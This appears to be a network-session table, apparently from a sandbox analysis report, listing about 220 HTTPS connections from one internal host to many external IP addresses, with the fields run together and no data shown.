                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10984192.168.2.145104825.109.231.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10985192.168.2.144856671.104.77.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10986192.168.2.1434300208.43.60.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10987192.168.2.1455110132.158.42.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10988192.168.2.1439596193.149.100.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10989192.168.2.143399432.7.158.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10990192.168.2.145862896.63.42.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10991192.168.2.1433628184.237.7.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10992192.168.2.1442490212.10.175.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10993192.168.2.144616048.202.179.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10994192.168.2.1438776202.127.167.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10995192.168.2.1459284223.222.86.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10996192.168.2.145610286.222.157.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10997192.168.2.144678031.39.119.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10998192.168.2.1446302161.137.39.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10999192.168.2.143645246.194.104.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11000192.168.2.1433534140.248.158.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11001192.168.2.145829220.42.43.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11002192.168.2.144316687.56.66.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11003192.168.2.1443454177.121.167.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11004192.168.2.1444590100.51.210.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11005192.168.2.1436106110.251.114.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11006192.168.2.144067034.42.109.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11007192.168.2.1442012109.213.50.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11008192.168.2.1454166180.12.86.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11009192.168.2.14473525.107.81.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11010192.168.2.1438140155.120.194.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11011192.168.2.1459336173.71.77.1628080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11012192.168.2.1447442220.246.194.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11013192.168.2.143642038.13.161.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11014192.168.2.144686238.239.245.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11015192.168.2.145431248.131.247.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11016192.168.2.144092868.134.207.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11017192.168.2.1441638199.129.254.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11018192.168.2.1434978114.223.49.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11019192.168.2.1454620222.108.205.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11020192.168.2.1449928203.0.102.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11021192.168.2.1451034196.199.186.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11022192.168.2.143288823.113.11.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11023192.168.2.1441464113.89.132.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11024192.168.2.143673696.80.173.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11025192.168.2.1448816154.223.23.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11026192.168.2.143692898.167.227.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11027192.168.2.1436214222.164.174.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11028192.168.2.144467424.105.9.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11029192.168.2.1433142122.82.78.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11030192.168.2.1446230220.192.13.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11031192.168.2.1442740192.24.107.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11032192.168.2.145881044.210.107.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11033192.168.2.1451678125.98.216.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11034192.168.2.1433576108.250.113.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11035192.168.2.143540297.30.232.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11036192.168.2.1444030202.214.90.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11037192.168.2.1458490218.7.26.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11038192.168.2.144575025.87.107.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11039192.168.2.144431859.101.34.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11040192.168.2.14473242.245.183.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11041192.168.2.145457271.246.134.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11042192.168.2.145260235.104.95.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11043192.168.2.143611698.62.94.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11044192.168.2.1454824113.217.51.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11045192.168.2.145949836.254.186.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11046192.168.2.1445560160.127.94.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11047192.168.2.1456388119.54.61.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11048192.168.2.143578097.65.81.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11049192.168.2.145713846.59.150.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11050192.168.2.1451028156.11.81.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11051192.168.2.1434914207.70.128.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11052192.168.2.1450752181.89.53.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11053192.168.2.1442780155.246.159.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11054192.168.2.1455276170.241.157.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11055192.168.2.1434024194.118.116.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11056192.168.2.1447222222.27.123.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11057192.168.2.144469239.202.178.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11058192.168.2.1459194166.72.230.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11059192.168.2.1454924220.107.178.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11060192.168.2.1452282124.253.80.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11061192.168.2.1455580212.218.94.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11062192.168.2.1445280198.106.185.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11063192.168.2.145612283.189.17.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11064192.168.2.1442724219.101.80.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11065192.168.2.145944013.38.149.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11066192.168.2.144458087.199.83.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11067192.168.2.1447966202.185.34.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11068192.168.2.1455210194.220.131.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11069192.168.2.144620276.213.148.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11070192.168.2.143388280.219.207.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11071192.168.2.144655032.233.199.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11072192.168.2.1460010178.148.99.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11073192.168.2.143831254.250.26.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11074192.168.2.144339436.211.185.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11075192.168.2.143648670.124.82.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11076192.168.2.145952850.211.188.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11077192.168.2.144954053.164.166.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11078192.168.2.1440306164.33.110.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11079192.168.2.1457684168.28.236.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11080192.168.2.1441230117.60.244.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11081192.168.2.144476261.199.209.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11082192.168.2.144748084.107.108.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11083192.168.2.144080042.138.207.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11084192.168.2.143834863.229.173.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11085192.168.2.1450798143.56.121.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11086192.168.2.144117620.53.229.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11087192.168.2.1453172144.151.40.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11088192.168.2.1451004178.176.192.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11089192.168.2.144309478.31.106.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11090192.168.2.1446168104.21.146.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11091192.168.2.1442534212.17.213.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11092192.168.2.143944664.109.60.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11093192.168.2.144273658.179.189.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11094192.168.2.1451302118.109.117.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11095192.168.2.144868020.33.85.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11096192.168.2.144790471.25.42.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11097192.168.2.145286860.36.24.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11098192.168.2.1436554155.218.48.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11099192.168.2.143313634.87.150.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11100192.168.2.1458748100.168.212.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11101192.168.2.143804265.192.109.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11102192.168.2.1459692180.174.36.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11103192.168.2.1449960109.80.150.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11104192.168.2.145603031.43.122.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11105192.168.2.1440816204.28.84.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11106192.168.2.1452156198.191.237.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11107192.168.2.1455234104.50.30.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11108192.168.2.1448838205.190.167.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11109192.168.2.1435770133.176.209.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11110192.168.2.1436210126.112.74.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11111192.168.2.14516668.144.100.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11112192.168.2.1438662199.240.185.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11113192.168.2.1449242206.200.66.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11114192.168.2.144708490.214.49.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11115192.168.2.1438904123.5.66.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11116192.168.2.1437992144.112.11.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11117192.168.2.144607613.41.205.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11118192.168.2.14533505.77.181.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11119192.168.2.1454978132.19.133.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11120192.168.2.1443252136.17.25.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11121192.168.2.1460798196.139.250.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11122192.168.2.1438814103.156.29.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11123192.168.2.1452042216.48.96.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11124192.168.2.1447994101.245.222.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11125192.168.2.1460348208.148.155.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11126192.168.2.1456852205.39.31.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11127192.168.2.1452252221.122.112.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11128192.168.2.143536414.46.22.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11129192.168.2.1450562125.253.68.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11130192.168.2.1438746119.144.102.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11131192.168.2.1456676139.176.115.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11132192.168.2.14531224.188.250.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11133192.168.2.144390058.7.179.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11134192.168.2.1449722106.195.77.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11135192.168.2.1446422187.28.216.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11136192.168.2.143495239.23.35.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11137192.168.2.1457298120.143.78.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11138192.168.2.1443182150.112.94.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11139192.168.2.1444916149.30.203.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11140192.168.2.1446108222.122.191.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11141192.168.2.145448451.82.80.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11142192.168.2.1454738199.47.165.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11143192.168.2.145619432.159.146.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11144192.168.2.1450306143.108.171.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11145192.168.2.1449812209.156.130.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11146192.168.2.1460308201.97.35.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11147192.168.2.145080295.17.36.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11148192.168.2.1441642100.235.27.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11149192.168.2.1435268154.212.182.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11150192.168.2.1459318114.212.95.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11151192.168.2.1456330115.99.252.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11152192.168.2.1433106132.197.240.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11153192.168.2.1437770181.34.167.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11154192.168.2.144798685.33.203.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11155192.168.2.145470484.225.15.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11156192.168.2.143876897.104.18.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11157192.168.2.1438984182.46.113.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11158192.168.2.1458888124.149.87.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11159192.168.2.1433770154.39.53.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11160192.168.2.1445746175.8.113.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11161192.168.2.1433196140.195.185.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11162192.168.2.1448678118.37.149.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11163192.168.2.1446828132.121.96.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11164192.168.2.1441914167.233.136.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11165192.168.2.144270823.145.37.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11166192.168.2.145550650.219.47.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11167192.168.2.1436086206.224.196.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11168192.168.2.145849051.144.188.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11169192.168.2.1454106120.39.237.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11170192.168.2.1448782145.169.116.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11171192.168.2.144150252.228.95.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11172192.168.2.1460194181.188.6.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11173192.168.2.144817843.71.27.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11174192.168.2.1447568194.37.73.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11175192.168.2.1449586145.227.162.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11176192.168.2.1435872178.52.215.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11177192.168.2.145173448.167.229.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11178192.168.2.144236694.231.171.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11179192.168.2.1441722104.210.161.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11180192.168.2.1442522203.49.25.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11181192.168.2.1447278206.74.209.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11182192.168.2.1451324100.251.106.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11183192.168.2.143301684.44.134.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11184192.168.2.1435582200.198.131.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11185192.168.2.1439880107.168.152.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11186192.168.2.1442680146.252.63.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11187192.168.2.1452668101.53.31.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11188192.168.2.1449314176.19.7.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11189192.168.2.1447292211.219.6.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11190192.168.2.1435290116.58.21.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11191192.168.2.145650471.71.119.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11192192.168.2.145493646.134.222.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11193192.168.2.1447280156.21.68.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11194192.168.2.1435664188.218.16.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11195192.168.2.1451338156.54.170.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11196192.168.2.1441624133.45.31.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11197192.168.2.145065065.235.14.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11198192.168.2.143354431.66.243.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11199192.168.2.144245461.139.222.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11200192.168.2.1442640190.129.57.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11201192.168.2.1441600157.194.249.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11202192.168.2.1453336148.143.78.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11203192.168.2.1446002180.77.13.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11204192.168.2.1444924162.169.82.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11205192.168.2.1433748192.87.93.251443
